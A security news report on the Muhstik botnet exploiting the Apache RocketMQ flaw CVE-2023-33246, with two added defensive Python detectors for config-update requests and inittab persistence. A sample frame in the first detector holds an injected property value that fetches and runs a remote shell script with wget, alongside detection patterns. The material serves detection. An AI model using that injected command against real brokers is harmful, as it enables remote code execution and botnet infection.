Muhstik Botnet Exploiting Apache RocketMQ Flaw to Expand DDoS Attacks

Jun 06, 2024 | Newsroom | Botnet / DDoS Attack

The distributed denial-of-service (DDoS) botnet known as Muhstik has been observed leveraging a now-patched security flaw impacting Apache RocketMQ to co-opt susceptible servers and expand its scale.

"Muhstik is a well-known threat targeting IoT devices and Linux-based servers, notorious for its ability to infect devices and utilize them for cryptocurrency mining and launching Distributed Denial of Service (DDoS) attacks," cloud security firm Aqua said in a report published this week.

First documented in 2018, attack campaigns involving the malware have a history of exploiting known security flaws, particularly those affecting web applications, for propagation.

The latest addition to the list of exploited vulnerabilities is CVE-2023-33246 (CVSS score: 9.8), a critical security flaw affecting Apache RocketMQ that allows a remote and unauthenticated attacker to achieve remote code execution by forging RocketMQ protocol content or by using the update configuration function, which the broker exposes without authentication.
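The update-configuration path is observable on the wire, which makes it a reasonable detection point for anyone who cannot patch immediately. The following is an added example written for this article, not code from Aqua or from the Apache RocketMQ project. It assumes the RocketMQ remoting frame layout as implemented in RemotingCommand (4-byte big-endian total length, a 4-byte header-length field whose top byte is the serialize type, a JSON header, then the body), the request codes UPDATE_BROKER_CONFIG = 25 and UPDATE_NAMESRV_CONFIG = 318, and the newline-separated key=value body those requests carry. The sample frames are constructed here for illustration and are not from a real capture.

```python
"""Flag Apache RocketMQ config-update requests in captured TCP payloads (added example)."""
import json
import struct

# RemotingCommand wire format: 4-byte total length, 4-byte header field
# (top byte = serialize type, low 24 bits = header length), JSON header, body.
UPDATE_BROKER_CONFIG = 25     # RequestCode.UPDATE_BROKER_CONFIG
UPDATE_NAMESRV_CONFIG = 318   # RequestCode.UPDATE_NAMESRV_CONFIG
HEART_BEAT = 34               # RequestCode.HEART_BEAT (used for a benign sample below)
SERIALIZE_JSON = 0

# Broker properties whose values are later interpolated into a shell command line
# by the broker's filter-server startup logic (the abused path in CVE-2023-33246).
SENSITIVE_KEYS = {"rocketmqHome", "filterServerNums"}
SHELL_METACHARS = set(";|&`$<>(){}")


def parse_frame(frame: bytes):
    """Split one remoting frame into (header dict, body bytes); raise on malformed input."""
    if len(frame) < 8:
        raise ValueError("frame too short")
    total_len, header_field = struct.unpack(">II", frame[:8])
    serialize_type = header_field >> 24
    header_len = header_field & 0xFFFFFF
    if serialize_type != SERIALIZE_JSON:
        raise ValueError("only JSON-serialized headers are handled here")
    if total_len != len(frame) - 4 or 8 + header_len > len(frame):
        raise ValueError("length fields inconsistent with captured frame")
    header = json.loads(frame[8:8 + header_len].decode("utf-8"))
    body = frame[8 + header_len:]
    return header, body


def parse_properties(body: bytes) -> dict:
    """Config-update bodies are newline-separated key=value pairs."""
    props = {}
    for line in body.decode("utf-8", errors="replace").splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            props[key.strip()] = value.strip()
    return props


def inspect_frame(frame: bytes) -> list:
    """Return alert strings for one frame; empty list means nothing of interest."""
    header, body = parse_frame(frame)
    code = header.get("code")
    alerts = []
    if code not in (UPDATE_BROKER_CONFIG, UPDATE_NAMESRV_CONFIG):
        return alerts
    alerts.append(f"config update request (code {code}); expected only from admin hosts")
    for key, value in parse_properties(body).items():
        if key in SENSITIVE_KEYS:
            alerts.append(f"sensitive property {key!r} set to {value!r}")
        if SHELL_METACHARS & set(value):
            alerts.append(f"shell metacharacters in value of {key!r}")
    return alerts


def build_frame(code: int, body: bytes) -> bytes:
    """Encode a minimal JSON-header frame, used here only to construct sample input."""
    header = json.dumps({"code": code, "language": "JAVA", "version": 395,
                         "opaque": 1, "flag": 0, "extFields": {}}).encode("utf-8")
    header_field = (SERIALIZE_JSON << 24) | len(header)
    total_len = 4 + len(header) + len(body)
    return struct.pack(">II", total_len, header_field) + header + body


# Constructed sample frames (not from a real incident); 198.51.100.7 is a TEST-NET address.
HEARTBEAT_FRAME = build_frame(HEART_BEAT, b"")
BENIGN_FRAME = build_frame(UPDATE_BROKER_CONFIG, b"flushDiskType=ASYNC_FLUSH\n")
SUSPICIOUS_FRAME = build_frame(
    UPDATE_BROKER_CONFIG,
    b"filterServerNums=1\nrocketmqHome=/tmp/x; wget -qO- http://198.51.100.7/ldr.sh | sh\n",
)

if __name__ == "__main__":
    for name, frame in (("heartbeat", HEARTBEAT_FRAME), ("benign", BENIGN_FRAME),
                        ("suspicious", SUSPICIOUS_FRAME)):
        print(name, inspect_frame(frame))
```

Any config-update request arriving on the broker port (10911 by default) from a host that is not an administration box deserves an alert on its own; the metacharacter check only raises the priority. The parser deliberately refuses frames whose length fields disagree with the captured bytes rather than guessing, since truncated or reassembled captures are common.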


Once the flaw is successfully exploited to obtain initial access, the threat actor executes a shell script hosted on a remote IP address, which is then responsible for retrieving the Muhstik binary ("pty3") from another server.

"After gaining the ability to upload the malicious payload by exploiting the RocketMQ vulnerability, the attacker is able to execute their malicious code, which downloads the Muhstik malware," security researcher Nitzan Yaakov said.

Persistence on the host is achieved by copying the malware binary to multiple directories and editing the /etc/inittab file, which controls what processes are started when a Linux server boots, so that the process is automatically restarted.

What's more, naming the binary "pty3" is likely an attempt to masquerade as a pseudoterminal ("pty") and evade detection. Another evasion technique is that the malware is copied to directories such as /dev/shm, /var/tmp, /run/lock, and /run during the persistence phase, which allows it to be executed directly from memory and avoid leaving traces on disk. One caveat for responders: /dev/shm and /run are normally tmpfs mounts and are cleared on reboot, but /var/tmp is usually on disk, so a copy there survives a restart and can be recovered for analysis.
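The two persistence traits described above, an inittab entry that respawns a binary parked in a temp or tmpfs directory and a "pty"-named executable in one of those directories, translate directly into a host check. The following is an added example written for this article, not code from Aqua or from the Muhstik samples; it assumes the SysV inittab field layout (id:runlevels:action:process) and uses the four drop directories the report names. The sample inittab is constructed for illustration.

```python
"""Hunt for inittab-based persistence from temp/tmpfs drop directories (added example)."""
import os
import stat
from pathlib import Path

# Drop locations named in the report. /dev/shm and /run (incl. /run/lock) are normally
# tmpfs; /var/tmp is usually on disk, so files there outlive a reboot.
DROP_DIRS = ("/dev/shm", "/var/tmp", "/run/lock", "/run")


def parse_inittab(text: str):
    """Yield (id, runlevels, action, process) from SysV inittab text, skipping comments."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":", 3)
        if len(parts) == 4:
            yield tuple(parts)


def suspicious_inittab_entries(text: str, drop_dirs=DROP_DIRS) -> list:
    """Return entries whose program lives in a drop directory or is named like a fake pty."""
    hits = []
    for entry in parse_inittab(text):
        process = entry[3].split()
        exe = process[0] if process else ""
        in_drop_dir = any(exe == d or exe.startswith(d.rstrip("/") + "/") for d in drop_dirs)
        fake_pty = os.path.basename(exe).startswith("pty")
        if in_drop_dir or fake_pty:
            hits.append(entry)
    return hits


def executables_in(directory) -> list:
    """List regular files with any execute bit set directly inside `directory`.

    A missing directory yields an empty list; symlinks are not followed."""
    d = Path(directory)
    if not d.is_dir():
        return []
    found = []
    for p in d.iterdir():
        try:
            st = p.lstat()
        except OSError:
            continue
        if stat.S_ISREG(st.st_mode) and st.st_mode & 0o111:
            found.append(str(p))
    return sorted(found)


def scan_drop_dirs(drop_dirs=DROP_DIRS) -> dict:
    """Map each drop directory to the executables currently parked in it."""
    return {d: executables_in(d) for d in drop_dirs}


# Constructed sample inittab, not taken from a real host.
SAMPLE_INITTAB = """\
# constructed sample
id:3:initdefault:
si::sysinit:/etc/init.d/rcS
1:2345:respawn:/sbin/getty 38400 tty1
x1:2345:respawn:/dev/shm/pty3
x2:2345:respawn:/var/tmp/pty3
"""

if __name__ == "__main__":
    try:
        live = Path("/etc/inittab").read_text()
    except OSError:
        live = SAMPLE_INITTAB
        print("no /etc/inittab readable; using constructed sample")
    for hit in suspicious_inittab_entries(live):
        print("suspicious inittab entry:", ":".join(hit))
    for directory, files in scan_drop_dirs().items():
        for f in files:
            print("executable in drop dir:", f)
```

Systemd hosts have no live /etc/inittab, so an edited or newly created one on such a system is itself worth a look, and the drop-directory scan applies regardless of init system. Executables in /dev/shm or /run are rarely legitimate on a message-broker host; /var/tmp gets more benign traffic, so treat hits there as leads rather than verdicts.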


Muhstik comes equipped with features to gather system metadata, move laterally to other devices over secure shell (SSH), and ultimately establish contact with a command-and-control (C2) domain to receive further instructions using the Internet Relay Chat (IRC) protocol.

The end goal of the malware is to weaponize the compromised devices to carry out different types of flooding attacks against targets of interest, overwhelming their network resources and triggering a denial-of-service condition.

With 5,216 vulnerable instances of Apache RocketMQ still exposed to the internet more than a year after public disclosure of the flaw, it is essential that organizations update to the latest version in order to mitigate potential threats. The fix shipped in RocketMQ 5.1.1 for the 5.x line and 4.9.6 for the 4.x line; beyond patching, the NameServer and broker ports should not be reachable from the internet in the first place, since the remoting protocol itself carries no authentication.


"Moreover, in previous campaigns, cryptomining activity was detected after the execution of the Muhstik malware," Yaakov said. "These objectives go hand in hand, as the attackers strive to spread and infect more machines, which helps them in their mission to mine more cryptocurrency using the electrical power of the compromised machines."

The disclosure comes as the AhnLab Security Intelligence Center (ASEC) revealed that poorly secured MS-SQL servers are being targeted by threat actors to deploy various kinds of malware, ranging from ransomware and remote access trojans to proxyware.

"Administrators must use passwords that are difficult to guess for their accounts and change them periodically to protect the database server from brute-force attacks and dictionary attacks," ASEC said. "They must also apply the latest patches to prevent vulnerability attacks."
